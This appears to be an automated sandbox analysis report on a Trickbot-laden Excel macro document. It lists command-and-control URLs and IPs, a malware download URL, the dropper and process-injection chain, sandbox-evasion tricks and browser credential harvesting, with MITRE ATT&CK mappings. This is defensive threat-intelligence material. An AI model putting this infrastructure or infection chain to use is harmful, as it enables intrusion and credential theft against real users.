Source: wermgr.exe, 00000006.00000002.2369616233.00000000335C0000.00000004.00000001.sdmp; String found in binary or memory: https://103.233.118.34:447/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/5/pwgrab64/
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2369616233.00000000335C0000.00000004.00000001.sdmp; String found in binary or memory: https://193.8.194.96/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/14/NAT%20status/client%20
Source: wermgr.exe, 00000006.00000002.2364462409.000000000035A000.00000004.00000020.sdmp; String found in binary or memory: https://45.155.173.242/rob60/134349_W617601.1D7953BB38B5711FB702EBB79BB8BAD5/5/file/
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: https://ident.me/
Source: wermgr.exe, 00000006.00000002.2364479573.000000000036D000.00000004.00000020.sdmp; String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown; Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49173 -> 443

                E-Banking Fraud:

                Yara detected Trickbot
                Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 2832, type: MEMORY

                System Summary:

                Found malicious Excel 4.0 Macro
                Source: Sign-1870635479_637332644.xls | Initial sample: urlmon
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above . 15 16 Once you have enabled editing, please c
                Source: Screenshot number: 4 | Screenshot OCR: Enable content button " from the yellow bar above )1 23 24 25 26 27 28 29 30 31 32 33
                Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 0 | Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
                Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 1 | Screenshot OCR: Enable content button from the yellow bar above j'
                Found Excel 4.0 Macro with suspicious formulas
                Source: Sign-1870635479_637332644.xls | Initial sample: EXEC
                Office process drops PE file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
                Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007B470 NtDelayExecution,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,HeapFree,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00068010
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00082060
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BCA0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00078CA0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006E0F0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000789B0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00069200
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061290
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000743C0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00077840
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00080870
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000644C0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000790E0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000714F0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061500
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00076100
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00076D10
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00072580
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007CA00
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007BE20
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00077630
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007CE70
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006A280
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006C290
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006CEB0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007B700
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00073B00
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006E310
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00062720
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00075F70
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000763A8
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000717B0
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000A0040
                Source: Sign-1870635479_637332644.xls | OLE indicator, VBA macros: true
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Joe Sandbox View | Dropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Sign-1870635479_637332644.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                Source: rundll32.exe, 00000003.00000002.2101338428.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2099089069.0000000001E10000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2370111419.0000000033B90000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2364431540.00000000007E0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLS@12/14@8/7
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006376C CoCreateInstance,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\EADE0000
                Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{BA5C2D35-9525-F18A-93AF-F2722C9E59B0}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCDD9.tmp
                Source: Sign-1870635479_637332644.xls | OLE indicator, Workbook stream: true
                Source: C:\Windows\System32\wermgr.exe | System information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\wermgr.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 events)
                Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknown | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknown | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {C999D15C-7BEE-4793-989A-0EF4E6A22007} S-1-5-18:NT AUTHORITY\System:Service:
                Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer
                Source: C:\Windows\System32\taskeng.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb | source: rundll32.exe, 00000004.00000002.2100627167.000000006E419000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_007C1BD0 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_007C1CFD push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_007C1C7A push dword ptr [edx+14h]; ret
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007D0F0 push 8B48D233h; iretd
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA

                Boot Survival:

                Drops PE files to the user root directory
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
                Source: C:\Windows\System32\wermgr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (25 events)
                Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exe | Process information set: NOOPENFILEERRORBOX (2 events)
                Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
                Source: C:\Windows\System32\wermgr.exe | Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened,directoryQueried
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Windows\System32\wermgr.exe | RDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007F110CB35C50h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007F110CB2DAE6h 0x00000048 rdtsc
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exe | Code function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                Source: C:\Windows\System32\taskeng.exe TID: 2472 | Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\wermgr.exe | Last function: Thread delayed (2 events)
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00073070 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E40B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, (2 events)
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E407DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_00082060 SetCurrentDirectoryW,SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                Allocates memory in foreign processes
                Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\wermgr.exe base: 60000
                Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\wermgr.exe base: FF2B93F8
                Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer
                Source: wermgr.exe, 00000006.00000002.2364543296.0000000000710000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                Source: wermgr.exe, 00000006.00000002.2364543296.0000000000710000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000006.00000002.2364543296.0000000000710000.00000002.00000001.sdmp | Binary or memory string: !Progman
                Source: C:\Windows\System32\wermgr.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\taskeng.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\System32\wermgr.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

                Stealing of Sensitive Information:

                Yara detected Trickbot
                Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 2832, type: MEMORY
                Yara detected Trickbot
                Source: Yara match | File source: 00000004.00000002.2098758914.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.2094809366.0000000000324000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.2094797786.0000000000324000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2099036393.0000000000878000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2098808409.00000000002F0000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara match | File source: 4.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\System32\wermgr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSecurityPreloadState.txt
                Source: C:\Windows\System32\wermgr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultcompatibility.ini
                Source: C:\Windows\System32\wermgr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultAlternateServices.txt
                Source: C:\Windows\System32\wermgr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.defaultSiteSecurityServiceState.txt

                Remote Access Functionality:

                Yara detected Trickbot
                Source: Yara match | File source: Process Memory Space: wermgr.exe PID: 2832, type: MEMORY
                Yara detected Trickbot
                Source: Yara match | File source: 00000004.00000002.2098758914.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.2094809366.0000000000324000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.2094797786.0000000000324000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2099036393.0000000000878000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2098808409.00000000002F0000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara match | File source: 4.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Scripting21 | Path Interception | Extra Window Memory Injection1 | Disable or Modify Tools21 | OS Credential Dumping1 | File and Directory Discovery2 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Access Token Manipulation1 | Scripting21 | LSASS Memory | System Information Discovery114 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Encrypted Channel22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Process Injection212 | Obfuscated Files or Information2 | Security Account Manager | Query Registry1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Extra Window Memory Injection1 | NTDS | Security Software Discovery22 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap |  | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading121 | LSA Secrets | Virtualization/Sandbox Evasion1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol13 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion1 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation1 | DCSync | Remote System Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection212 | Proc Filesystem | System Network Configuration Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll321 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

                Behavior Graph


                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 355634 | Sample: Sign-1870635479_637332644.xls | Startdate: 20/02/2021 | Architecture: WINDOWS | Score: 100
                Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Antivirus detection for URL or domain; 10 other signatures
                EXCEL.EXE (started): contacts chipmania.it (185.81.0.78, ports 49165 and 80, SERVERPLAN-ASIT, Italy) and www.chipmania.it; drops C:\Users\user\BASE.BABAA (PE32) and C:\Users\user\AppData\Local\...\10[1].jjkes (PE32); signatures: Document exploit detected (process start blacklist hit), Document exploit detected (UrlDownloadToFile); starts rundll32.exe
                taskeng.exe (started): starts rundll32.exe
                rundll32.exe (child of EXCEL.EXE): starts a second rundll32.exe; signatures on that child: Writes to foreign memory regions, Allocates memory in foreign processes; it starts two wermgr.exe instances
                wermgr.exe: signatures: Tries to detect virtualization through RDTSC time measurements, Found evasive API chain (trying to detect sleep duration tampering with parallel thread), Tries to harvest and steal browser information (history, passwords, etc); contacts 193.8.194.96 (ports 443, 49170, 49173, FIBERHUBUS, United Kingdom), 5.202.150.151 (port 447, DIDEHABNNETIR, Iran (ISLAMIC Republic Of)) and 9 other IPs or domains

                Screenshots


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | 11% | Metadefender |
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | 41% | ReversingLabs | Win32.Trojan.Trickpak
                C:\Users\user\BASE.BABAA | 11% | Metadefender |
                C:\Users\user\BASE.BABAA | 41% | ReversingLabs | Win32.Trojan.Trickpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                Source | Detection | Scanner | Label
                ident.me | 0% | Virustotal |
                chipmania.it | 1% | Virustotal |
                www.chipmania.it | 2% | Virustotal |

                URLs


                Domains and IPs

                Contacted Domains

Name | IP | Active | Malicious | Reputation
ident.me | 176.58.123.25 | true | false | unknown
chipmania.it | 185.81.0.78 | true | false | unknown
38.52.17.84.zen.spamhaus.org | unknown | unknown | false | high
38.52.17.84.cbl.abuseat.org | unknown | unknown | false | high
38.52.17.84.dnsbl-1.uceprotect.net | unknown | unknown | false | unknown
www.chipmania.it | unknown | unknown | false | unknown
38.52.17.84.b.barracudacentral.org | unknown | unknown | false | high
38.52.17.84.spam.dnsbl.sorbs.net | unknown | unknown | false | high

                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.chipmania.it/mails/open.php | true | Avira URL Cloud: malware | unknown

                          URLs from Memory and Binaries


                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.155.173.242 | unknown | Germany | 30823 | COMBAHTONcombahtonGmbHDE | true
5.202.150.151 | unknown | Iran (ISLAMIC Republic Of) | 201150 | DIDEHABNNETIR | true
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false
194.5.249.156 | unknown | Romania | 64398 | NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | false
193.8.194.96 | unknown | United Kingdom | 53340 | FIBERHUBUS | true
103.220.47.220 | unknown | Indonesia | 59290 | IDNIC-ALTRO-IDPTAltroAbiramaID | false
176.58.123.25 | unknown | United Kingdom | 63949 | LINODE-APLinodeLLCUS | false

                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 355634
Start date: 20.02.2021
Start time: 09:47:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 48s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Sign-1870635479_637332644.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLS@12/14@8/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 10% (good quality ratio 7.7%)
• Quality average: 72%
• Quality standard deviation: 41%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 67.26.73.254, 8.248.117.254, 67.27.158.254, 8.253.207.120, 67.26.137.254, 192.35.177.64
• Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net, apps.identrust.com

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
09:47:46 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
09:47:46 | API Interceptor | 19x Sleep call for process: wermgr.exe modified
09:48:50 | API Interceptor | 454x Sleep call for process: taskeng.exe modified

                                              Joe Sandbox View / Context

                                              IPs


Domains

Match | Associated Sample Name / URL | Detection | Context
ident.me | SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls | malicious | 176.58.123.25
ident.me | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | 176.58.123.25
ident.me | SecuriteInfo.com.Heur.1476.xls | malicious | 176.58.123.25
ident.me | Sign-92793351_1597657581.xls | malicious | 176.58.123.25
ident.me | SecuriteInfo.com.Heur.22173.xls | malicious | 176.58.123.25
ident.me | Sign_1229872171-1113140666(1).xls | malicious | 176.58.123.25
ident.me | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious | 176.58.123.25
ident.me | SecuriteInfo.com.Exploit.Siggen3.10048.15397.xls | malicious | 176.58.123.25
ident.me | SecuriteInfo.com.Exploit.Siggen3.10048.21627.xls | malicious | 176.58.123.25
ident.me | index_2021-02-17-11_45.dll | malicious | 176.58.123.25
ident.me | SecuriteInfo.com.Exploit.Siggen3.10048.426.xls | malicious | 176.58.123.25
